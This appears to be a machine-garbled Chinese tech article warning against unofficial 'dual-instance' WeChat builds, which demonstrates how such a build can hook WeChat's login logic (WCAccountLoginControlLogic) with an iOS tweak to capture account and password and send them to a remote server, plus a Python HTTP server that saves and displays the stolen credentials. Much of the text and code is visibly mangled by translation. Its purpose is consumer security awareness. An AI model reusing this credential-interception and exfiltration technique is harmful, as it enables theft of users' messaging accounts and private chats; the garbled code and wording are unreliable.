微信分身别人看得到吗 看了这个，你还敢用分身版微信吗？

链接:http://t.cn/Rqz7iTi

最近各种版本的微信头像疯传，很多人安装了不同版本的微信头像，无论是一键转发、一键评论还是其他版本的微信头像。

显然，很多人已经安装了这两个部分的版本，但不知道可能存在的风险。微信这两个部分的版本无非是篡改注入加载命令动态库的钩子函数。虽然你的手机没有越狱，但是你使用的微信的所有信息在安装了两部分版本的微信后都暴露给了别人。包括获取你的微信账号密码，聊天记录等。，所有的信息。

下面作者就如何获取微信账号密码并发送到指定服务器做一个简单的分析。看了这个，很有可能你安装的忙碌版微信已经收了你的微信账号和密码。

首先进入微信登录界面，查看ViewController的继承关系:

rootview controller]_ print hierarchy]

& lt免疫激活控制器0×18392800 >，状态:已出现，视图:& ltuilayoutcontainereview 0x 17 f 33790 & gt；

| & ltwcaccountloginlastserviewcontroller 0x 18 b 52600 & gt；，状态:已出现，视图:& ltUIView 0x192740d0>。

您可以得到当前的ViewController是wcaccountlinglastserview controller，并跟踪这个类。然后点击登录按钮，可以看到调用了onNext方法。使用IDA进入分析，可以知道WCAccountLoginControlLogic类负责处理具体的登录逻辑。跟踪WCAccountLoginControlLogic可以发现它是在登录时被调用的

–OnlastUserloginuserName:名称Pwd: pwd{}

传输的参数是微信账号和密码。现在演示如何截取微信账号密码并发送到指定服务器。

因为需要一个服务器来接收传输的数据，所以使用python的BaseHTTPRequestHandler来构建一个简单的服务器。

#!/usr/bin/env python

# -*-条件:utf-8 -*-

从baseHTTPServerimport baseHttprequesthandler，Httpserver

从urlparse导入urlparse，parse_qs

' DEFAULT_HOST= ' '

默认端口= 8080

类请求处理程序:

defdo_GET:

params = parse _ QS。查询)

self.send_response

self.send_header

self.end_headers

#获取帐户密码

fread= open

line = fread . readline；

#每2秒刷新一次

内容= ' & lt' meta http-equiv = " refresh " content = " 2 " >'

对于线内连线:

content = content+line+' & lt；br & gt'

#将消息发送到浏览器

self.wfile.write

返回

def do_POST:

params = parse _ QS。查询)

#保存帐户密码

fwrite= open

fwrite.write

fwrite . write

fwrite.close

self.send_response

self.end_headers

返回

def run_server:

尝试:

服务器地址=

server = HttpSERVER

打印" HTTP服务器在端口%s启动" % DEFAULT_PORT

server.serve _ forever

例外情况除外，错误:

打印"错误:% s " %错误

例外键盘中断:

打印“服务器中断并正在关闭...”

server.socket.close

if__name__== "__main__ ":

run_server

好了，简单的服务器已经设置好了。post用于接受微信发送的账号和密码信息并保存到本地文件，然后通过get不断请求刷新获得的账号密码。

编写tweak拦截帐户密码并将其发送到刚刚构建的服务器:

%挂钩帐户控制逻辑

-OnlastUserloginuserName:Namepwd:pwd {

% log

nsmutablerlrequest * request =]；

；

；

completionhandler:^respone；

if{

NSLog;

}

}];

}

%end

重新登录微信，生成一个运行在非越狱机器上的微信的双版本，前面文章已经提到过。进入登录界面输入账号密码，每次输入账号密码都发送到我们搭建的服务器，然后在浏览器中输入http://localhost:8080/实时查看输入的账号密码是什么。

以上只是简单的演示。当然实际的头像版本也不能写的这么简单，一般都是混淆加密的，但也就是说一旦安装了微信的头像版本，微信上的所有信息都有可能被监控，导致隐私泄露。

我从网上下载了微信的拆分版，在dylib文件里找到了上传账号密码的代码

所以，即使你的手机没有越狱，也不要在网上下载微信头像，也不要从第三方渠道下载应用，因为你从第三方渠道下载的应用很有可能已经被篡改。

觉得这篇文章对你有帮助？请与更多人分享

关注“iOS大全”

查看更多特色iOS技术文章